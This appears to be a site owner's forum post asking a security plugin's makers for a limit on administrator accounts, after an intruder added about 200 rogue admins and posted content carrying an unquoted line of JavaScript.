Site Under Attack: Need Admin Limit

Around 200 new administrators were added to my database.

After installing this plugin and configuring every view. Another new admin user appeared.

Before finding this plugin I was going to create my own user firewall. One feature I wanted is a limit on the number of administrator accounts. I want to disable the limit when I need to create an admin account or even enter a secondary password. On detecting more admin accounts that my set limit I would want an email alert and the sites access reduced greatly.

Is there any chance of this feature being added soon please?

I know I have the bigger problem of figuring out the hack method. So far my hacker appears to only want to post content related to my sites content but they do have a line of JavaScript in them which I think is a measure to gain traffic. I think the hackers hope their content will go unnoticed.
